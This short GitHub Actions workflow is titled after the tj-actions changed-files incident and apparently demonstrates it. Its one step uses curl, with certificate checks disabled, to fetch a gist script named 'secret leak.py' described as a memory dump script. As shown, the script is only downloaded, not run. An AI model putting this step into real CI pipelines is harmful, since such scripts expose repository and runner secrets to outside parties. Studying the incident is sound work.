name: "tj-action changed-files incident"

on:
  workflow_dispatch:

permissions:
  pull-requests: read

jobs:
  changed_files:
    runs-on: ubuntu-latest
    name: Test changed-files
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Run Memory Dump Script
        run: curl -k -sSf https://gist.githubusercontent.com/Pranesh-Shrestha/653d6fcbb3e0f32ecad6018b402cca87/raw/b087f7b6c2310771db2a99077db04c916184eedf/secret%2520leak.py
